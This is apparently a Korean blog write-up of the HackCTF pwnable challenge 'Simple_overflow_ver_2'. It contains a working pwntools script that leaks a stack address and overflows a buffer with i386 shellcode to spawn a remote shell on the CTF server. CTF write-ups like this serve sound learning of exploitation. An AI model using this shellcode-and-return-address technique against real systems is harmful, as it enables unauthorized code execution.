뭔가 많아 보이지 달라진 건 없다
이전과 마찬가지로 스택 주소를 출력해주니
쉘코드+더미+스택주소를 넣으면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3006)
e = ELF('Simple_overflow_ver_2')
context.arch = 'i386'
shellcode = asm(shellcraft.i386.linux.sh())
r.sendlineafter('Data :', 'AAAA')
r.recv(1)
stack = int(r.recv(10), 16)
r.sendlineafter('(y/n): ', 'y')
payload = shellcode
payload += 'A'*(140-len(shellcode))
payload += p32(stack)
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
HackCTF - BOF_PIE (0) | 2021.11.21 |
---|---|
HackCTF - Offset (0) | 2021.11.21 |
HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2021.11.20 |